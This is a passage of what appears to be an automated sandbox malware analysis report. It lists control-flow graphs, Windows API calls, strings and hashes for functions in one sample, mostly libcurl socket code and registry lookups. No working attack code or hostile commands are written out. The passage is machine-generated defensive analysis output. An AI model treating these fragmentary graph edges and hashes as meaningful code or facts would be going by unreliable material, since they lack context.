eae4a0 1117->1124 1127 eb9ee5-eb9ef2 call eae9f0 1119->1127 1122->965 1122->1123 1123->1006 1157 eb9db7-eb9dc0 call eaeac0 1124->1157 1158 eb9d75-eb9d82 call eaec80 1124->1158 1127->951 1151 eb9ef8-eb9f0e call eae440 1127->1151 1147 eb9c7b-eb9c8f call eae7c0 1129->1147 1148 eba011 1129->1148 1137 eb9c37-eb9c51 call eae9f0 1130->1137 1137->1009 1173 eb9c57-eb9c64 call eae9d0 1137->1173 1161 eb9df1-eb9e04 call eae960 1142->1161 1143->1161 1147->1009 1168 eb9c95-eba00e 1147->1168 1148->1015 1171 eb9ed2-eb9edf call eae9e0 1151->1171 1172 eb9f10-eb9f26 call eae3c0 1151->1172 1174 eb9d85-eb9d98 call eae960 1157->1174 1158->1174 1161->1097 1161->1101 1168->1148 1171->951 1171->1127 1172->1171 1185 eb9f28 1172->1185 1173->1129 1173->1137 1174->1116 1174->1124 1185->965
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00EB9946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00EB9974
                                                              • RegCloseKey.KERNELBASE(?), ref: 00EB998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                              • API String ID: 3677997916-4129964100
                                                              • Opcode ID: c382775a1cf5eba11d39204a19a10fc0d1ab52722fd1d07fe30c18a23603cd00
                                                              • Instruction ID: f88047c02c67f2a93a92074790db803f7ebd4f3c0e8e6e8d327efc80368f2a12
                                                              • Opcode Fuzzy Hash: c382775a1cf5eba11d39204a19a10fc0d1ab52722fd1d07fe30c18a23603cd00
                                                              • Instruction Fuzzy Hash: D03299B5904201ABEB11AB24EC52AAB76E4AF95318F085434FD49BB363F731ED14C793
                                                              Function 00E28B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1269 e28b50-e28b69 1270 e28be6 1269->1270 1271 e28b6b-e28b74 1269->1271 1272 e28be9 1270->1272 1273 e28b76-e28b8d 1271->1273 1274 e28beb-e28bf2 1271->1274 1272->1274 1275 e28bf3-e28bfe call e2a550 1273->1275 1276 e28b8f-e28ba7 call e06e40 1273->1276 1281 e28de4-e28def 1275->1281 1282 e28c04-e28c08 1275->1282 1283 e28cd9-e28d16 SleepEx getsockopt 1276->1283 1284 e28bad-e28baf 1276->1284 1285 e28df5-e28e19 call e2a150 1281->1285 1286 e28e8c-e28e95 1281->1286 1287 e28c0e-e28c1d 1282->1287 1288 e28dbd-e28dc3 1282->1288 1291 e28d22 1283->1291 1292 e28d18-e28d20 1283->1292 1289 e28ca6-e28cb0 1284->1289 1290 e28bb5-e28bb9 1284->1290 1328 e28e1b-e28e26 1285->1328 1329 e28e88 1285->1329 1294 e28f00-e28f06 1286->1294 1295 e28e97-e28e9c 1286->1295 1297 e28c35-e28c48 call e2a150 1287->1297 1298 e28c1f-e28c34 connect 1287->1298 1288->1272 1289->1283 1299 e28cb2-e28cb8 1289->1299 1290->1274 1300 e28bbb-e28bc2 1290->1300 1293 e28d26-e28d39 1291->1293 1292->1293 1302 e28d43-e28d61 call e0d8c0 call e2a150 1293->1302 1303 e28d3b-e28d3d 1293->1303 1294->1274 1304 e28e9e-e28eb6 call e02a00 1295->1304 1305 e28edf-e28eef call df78b0 1295->1305 1330 e28c4d-e28c4f 1297->1330 1298->1297 1307 e28cbe-e28cd4 call e2b180 1299->1307 1308 e28ddc-e28dde 1299->1308 1300->1274 1309 e28bc4-e28bcc 1300->1309 1332 e28d66-e28d74 1302->1332 1303->1302 1303->1308 1304->1305 1327 e28eb8-e28edd call e03410 * 2 1304->1327 1325 e28ef2-e28efc 1305->1325 1307->1281 1308->1272 1308->1281 1315 e28bd4-e28bda 1309->1315 1316 e28bce-e28bd2 1309->1316 1315->1274 1317 e28bdc-e28be1 1315->1317 1316->1274 1316->1315 1324 e28dac-e28db8 call e350a0 1317->1324 1324->1274 1325->1294 1327->1325 1334 e28e28-e28e2c 1328->1334 1335 e28e2e-e28e85 call e0d090 call e34fd0 1328->1335 1329->1286 1336 e28c51-e28c58 1330->1336 1337 e28c8e-e28c93 1330->1337 1332->1274 1343 e28d7a-e28d81 1332->1343 1334->1329 1334->1335 1335->1329 1336->1337 1339 e28c5a-e28c62 1336->1339 1341 e28dc8-e28dd9 call e2b100 1337->1341 1342 e28c99-e28c9f 1337->1342 1346 e28c64-e28c68 1339->1346 1347 e28c6a-e28c70 1339->1347 1341->1308 1342->1289 1343->1274 1349 e28d87-e28d8f 1343->1349 1346->1337 1346->1347 1347->1337 1351 e28c72-e28c8b call e350a0 1347->1351 1353 e28d91-e28d95 1349->1353 1354 e28d9b-e28da1 1349->1354 1351->1337 1353->1274 1353->1354 1354->1274 1358 e28da7 1354->1358 1358->1324
                                                              APIs
                                                              • connect.WS2_32(?,?,00000001), ref: 00E28C2F
                                                              • SleepEx.KERNELBASE(00000000,00000000), ref: 00E28CF3
                                                              • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00E28D0E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Sleepconnectgetsockopt
                                                              • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                              • API String ID: 1669343778-879669977
                                                              • Opcode ID: d7e3feb5b543e944c4d627a52c5c377b97e5e59d2eb22453c8b3ebfe6c3285e2
                                                              • Instruction ID: 5637fe4cfbe44776b2d5557d72ad7d9627fd39af1ebbc04941da9fa8ab30f215
                                                              • Opcode Fuzzy Hash: d7e3feb5b543e944c4d627a52c5c377b97e5e59d2eb22453c8b3ebfe6c3285e2
                                                              • Instruction Fuzzy Hash: 81B1F5746053059FD710CF24EE85BA7B7E4AF44318F08A62CE8596B2D2DB70EC58C762
                                                              Function 00DF2F17 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1455 df2f17-df2f8c call 12798f0 call 1279ce0 1460 df31c9-df31cd 1455->1460 1461 df31d3-df31d6 1460->1461 1462 df2f91-df2ff4 call df1619 RegOpenKeyExA 1460->1462 1465 df2ffa-df300b 1462->1465 1466 df31c5 1462->1466 1467 df315c-df31ac RegEnumKeyExA 1465->1467 1466->1460 1468 df31b2-df31c2 RegCloseKey 1467->1468 1469 df3010-df3083 call df1619 RegOpenKeyExA 1467->1469 1468->1466 1472 df314e-df3152 1469->1472 1473 df3089-df30d4 RegQueryValueExA 1469->1473 1472->1467 1474 df313b-df314b RegCloseKey 1473->1474 1475 df30d6-df3137 call 1279bc0 call 1279c50 call 1279ce0 call 1279af0 call 1279ce0 call 1278050 1473->1475 1474->1472 1475->1474
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: d
                                                              • API String ID: 1332880857-2564639436
                                                              • Opcode ID: d2cfc226f158f13973f52986552cb43515695eb2d40b69c2d3dd3d61180be5bd
                                                              • Instruction ID: 20924481e6d29a255b86acad408b6e000845194143280aa249d0b80b29c36537
                                                              • Opcode Fuzzy Hash: d2cfc226f158f13973f52986552cb43515695eb2d40b69c2d3dd3d61180be5bd
                                                              • Instruction Fuzzy Hash: 2B71D5B49043199FDB50DF69D4847AEBBF0BF84308F11885DE99897304E7749A88CF92
                                                              Function 00E29290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1488 e29290-e292ed call df76a0 1491 e293c3-e293ce 1488->1491 1492 e292f3-e292fb 1488->1492 1499 e293d0-e293e1 1491->1499 1500 e293e5-e29427 call e0d090 call e34f40 1491->1500 1493 e29301-e29333 call e0d8c0 call e0d9a0 1492->1493 1494 e293aa-e293af 1492->1494 1512 e293a7 1493->1512 1513 e29335-e29364 WSAIoctl 1493->1513 1496 e29456-e29470 1494->1496 1497 e293b5-e293bc 1494->1497 1502 e29429-e29431 1497->1502 1503 e293be 1497->1503 1499->1497 1504 e293e3 1499->1504 1500->1496 1500->1502 1507 e29433-e29437 1502->1507 1508 e29439-e2943f 1502->1508 1503->1496 1504->1496 1507->1496 1507->1508 1508->1496 1511 e29441-e29453 call e350a0 1508->1511 1511->1496 1512->1494 1516 e29366-e2936f 1513->1516 1517 e2939b-e293a4 1513->1517 1516->1517 1520 e29371-e29390 setsockopt 1516->1520 1517->1512 1520->1517 1521 e29392-e29395 1520->1521 1521->1517
                                                              APIs
                                                              • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00E2935C
                                                              • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00E29389
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: Ioctlsetsockopt
                                                              • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                              • API String ID: 1903391676-2691795271
                                                              • Opcode ID: a7e54114a1f40d230bb2f07195486cb20b0077794dc8da9c203235d05931d2a1
                                                              • Instruction ID: 5b89bb675c53e41ab9f64487437e3160beadb1e5d43f734922cb2ef019cc8b60
                                                              • Opcode Fuzzy Hash: a7e54114a1f40d230bb2f07195486cb20b0077794dc8da9c203235d05931d2a1
                                                              • Instruction Fuzzy Hash: 2251F371604305ABE710DF24CC81FAAB7A5FF84318F14A52DFD58AB282E730E991CB91
                                                              Function 00DF76A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1522 df76a0-df76be 1523 df76e6-df76f2 send 1522->1523 1524 df76c0-df76c7 1522->1524 1526 df775e-df7762 1523->1526 1527 df76f4-df7709 call df72a0 1523->1527 1524->1523 1525 df76c9-df76d1 1524->1525 1528 df770b-df7759 call df72a0 call dfcb20 call 1178c50 1525->1528 1529 df76d3-df76e4 1525->1529 1527->1526 1528->1526 1529->1527
                                                              APIs
                                                              • send.WS2_32(multi.c,?,?,?,00DF3D4E,00000000,?,?,00E007BF), ref: 00DF76EB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: send
                                                              • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                              • API String ID: 2809346765-3388739168
                                                              • Opcode ID: ee64788eb3e8c31a666d534aa3c0a8d8b280b5fd5aa0e269263924ab7b795a63
                                                              • Instruction ID: 98e883a59271fe6852c3a898c5058d7fab5cc30bb81f5805fe8cc77511796bda
                                                              • Opcode Fuzzy Hash: ee64788eb3e8c31a666d534aa3c0a8d8b280b5fd5aa0e269263924ab7b795a63
                                                              • Instruction Fuzzy Hash: 76112CF5A193087FE120AB16AC9AD777B5CEBD2B6CF0A850CFD0957305E2619C1082B1
                                                              Function 00DF7770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1641 df7770-df778e 1642 df77b6-df77c2 recv 1641->1642 1643 df7790-df7797 1641->1643 1645 df782e-df7832 1642->1645 1646 df77c4-df77d9 call df72a0 1642->1646 1643->1642 1644 df7799-df77a1 1643->1644 1647 df77db-df7829 call df72a0 call dfcb20 call 1178c50 1644->1647 1648 df77a3-df77b4 1644->1648 1646->1645 1647->1645 1648->1646
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: recv
                                                              • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                                              • API String ID: 1507349165-640788491
                                                              • Opcode ID: bba7209c0521d25f1ddafb485964081264f23025fb7f32f43dda00e362107369
                                                              • Instruction ID: aa23b15e09eec29beb59e13d2238f9683b14380f168380ed089d15c3ed8edd6c
                                                              • Opcode Fuzzy Hash: bba7209c0521d25f1ddafb485964081264f23025fb7f32f43dda00e362107369
                                                              • Instruction Fuzzy Hash: 98113AF5A183483BE120AB16AC5AE7B3B5CEBC6B6CF06851CFD0853309D2619C1482F1
                                                              Function 00DF75E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1660 df75e0-df75ed 1661 df75ef-df75f6 1660->1661 1662 df7607-df7629 socket 1660->1662 1661->1662 1665 df75f8-df75ff 1661->1665 1663 df763f-df7642 1662->1663 1664 df762b-df763c call df72a0 1662->1664 1664->1663 1667 df7643-df7699 call df72a0 call dfcb20 call 1178c50 1665->1667 1668 df7601-df7602 1665->1668 1668->1662
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001873000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287084745.0000000001874000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287234009.0000000001A38000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2287255490.0000000001A3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_df0000_ZFttiy4Tt8.jbxd
                                                              Similarity
                                                              • API ID: socket
                                                              • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                              • API String ID: 98920635-842387772
                                                              • Opcode ID: bb9ece8cfbfc910c5d5ae2a67dadd968f038c7722856d1190b7bef849571f12e
                                                              • Instruction ID: 79cfd3cdf42e8da735c3aeb3ccb33a2940db8ce1df2cfaf6a406d0b5f55d9a98
                                                              • Opcode Fuzzy Hash: bb9ece8cfbfc910c5d5ae2a67dadd968f038c7722856d1190b7bef849571f12e
                                                              • Instruction Fuzzy Hash: 34114CB6B102153BE6205B6E7C16FDB3B5CEF92728F098518F914D639AD211C86083F5
                                                              Function 00E2A150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1769 e2a150-e2a159 1770 e2a250 1769->1770 1771 e2a15f-e2a17b 1769->1771 1772 e2a181-e2a1ce getsockname 1771->1772 1773 e2a249-e2a24f 1771->1773 1774 e2a1d0-e2a1f5 call e0d090 1772->1774 1775 e2a1f7-e2a214 call e2ef30 1772->1775 1773->1770 1783 e2a240-e2a246 call e34f40 1774->1783 1775->1773 1779 e2a216-e2a23b call e0d090 1775->1779 1779->1783 1783->1773
                                                              APIs
                                                              • getsockname.WS2_32(?,?,00000080), ref: 00E2A1C7
                                                              Strings
                                                              • ssloc inet_ntop() failed with errno %d: %s, xrefs: 00E2A23B
                                                              • getsockname() failed with errno %d: %s, xrefs: 00E2A1F0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2285952660.0000000000DF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                                              • Associated: 00000002.00000002.2285922534.0000000000DF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.0000000001361000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2285952660.00000000014C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286654277.00000000014CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.00000000014CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001778000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000177E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.000000000185C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2286678171.0000000001864000.00000040.00000001.01000000.00000003.sdmpDownload File
